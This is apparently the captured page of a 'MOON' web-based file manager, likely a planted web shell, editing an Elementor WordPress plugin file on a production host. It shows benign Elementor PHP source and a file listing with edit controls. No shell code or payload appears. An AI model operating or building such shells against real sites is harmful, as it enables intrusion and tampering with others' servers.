┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/gshub/wp-content/plugins/elementor/core/document-types
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: post.php
<?php namespace Elementor\Core\DocumentTypes; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Post extends PageBase { /** * Get Properties * * Return the post document configuration properties. * * @access public * @static * * @return array */ public static function get_properties() { $properties = parent::get_properties(); $properties['support_kit'] = true; $properties['cpt'] = [ 'post' ]; return $properties; } /** * Get Type * * Return the post document type. * * @return string */ public static function get_type() { return 'wp-post'; } /** * Get Title * * Return the post document title. * * @access public * @static * * @return string */ public static function get_title() { return esc_html__( 'Post', 'elementor' ); } /** * Get Plural Title * * Return the post document plural title. * * @access public * @static * * @return string */ public static function get_plural_title() { return esc_html__( 'Posts', 'elementor' ); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 page-base.php
PHP
7.7 KB
2026-05-05 06:08
EDIT
📄 page.php
PHP
2.7 KB
2026-05-05 06:08
EDIT
📄 post.php
PHP
1 KB
2026-05-05 06:08
EDIT